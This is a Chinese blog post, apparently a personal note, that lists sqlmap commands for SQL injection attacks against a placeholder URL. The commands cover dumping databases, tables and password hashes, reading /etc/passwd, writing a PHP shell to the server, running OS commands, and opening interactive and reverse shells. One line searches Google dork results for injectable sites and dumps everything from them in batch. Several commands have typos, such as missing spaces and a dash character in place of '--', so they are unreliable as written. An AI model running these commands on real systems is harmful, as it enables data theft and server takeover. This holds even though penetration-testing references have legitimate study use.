Sqlmap基本命令整理


前言

Sqlmap 是一种开源渗透测试工具,可自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、许多用于最终渗透测试仪的利基功能,以及广泛的开关,包括数据库指纹识别、从数据库获取数据、访问底层文件系统以及通过带外连接在操作系统上执行命令。

官网:https://github.com/sqlmapproject/sqlmap


基本步骤

获取当前数据库名称

sqlmap -u "http://url/news?id=1" --current-db 

列表名

sqlmap -u "http://url/news?id=1" --tables -D "db_name" 

列字段

sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0

获取字段内容

sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0

信息获取

获取当前用户名称

sqlmap -u "http://url/news?id=1" --current-user 

smart 智能 level 执行测试等级

sqlmap -u "http://url/news?id=1" --smart --level 3 --users

dbms 指定数据库类型

sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users 

列数据库用户

sqlmap -u "http://url/news?id=1" --users

列数据库

sqlmap -u "http://url/news?id=1" --dbs

数据库用户密码

`sqlmap -u "http://url/news?id=1" --passwords

列出指定用户数据库密码

sqlmap -u "http://url/news?id=1" --passwords-U root -v 0

列出指定字段,列出 20 条

sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20

列出所有数据库所有表

sqlmap -u "http://url/news?id=1" --dump-all -v 0

查看权限

sqlmap -u "http://url/news?id=1" --privileges

#查看指定用户权限

sqlmap -u "http://url/news?id=1" --privileges -U root

是否是数据库管理员

sqlmap -u "http://url/news?id=1" --is-dba -v 1 

枚举数据库用户角色

sqlmap -u "http://url/news?id=1" --roles 

导入用户自定义函数(获取系统权限!)

sqlmap -u "http://url/news?id=1" --udf-inject 

列出当前库所有表

sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 

union查询表记录

sqlmap -u "http://url/news?id=1" --union-cols

cookie 注入

sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" 

获取 banner 信息

sqlmap -u "http://url/news?id=1" -b

post 注入

sqlmap -u "http://url/news?id=1" --data "id=3" 

指纹判别数据库类型

sqlmap -u "http://url/news?id=1" -v 1 -f 

代理注入

sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118" 

指定关键词

sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE" 

执行指定 sql 命令

sqlmap -u "http://url/news?id=1" --sql-shell 

读取系统文件

sqlmap -u "http://url/news?id=1" --file-read "/etc/passwd"

写入文件

sqlmap -u "http://url/news?id=1" --file-write="shell.php" —file-dest "/tmp/shell.php"

执行系统命令

sqlmap -u "http://url/news?id=1" --os-cmd=whoami 

系统交互 shell

sqlmap -u "http://url/news?id=1" --os-shell 

反弹 shell

sqlmap -u "http://url/news?id=1" --os-pwn 

读取 win 系统注册表

sqlmap -u "http://url/news?id=1" --reg-read 

保存进度

sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log" 

恢复已保存进度

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume

搜索注入点自动 跑出所有字段

sqlmap -g "google 语法" --dump-all --batch

更新ing………………………………
ps:之前摘抄的笔记,侵权请联系

  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值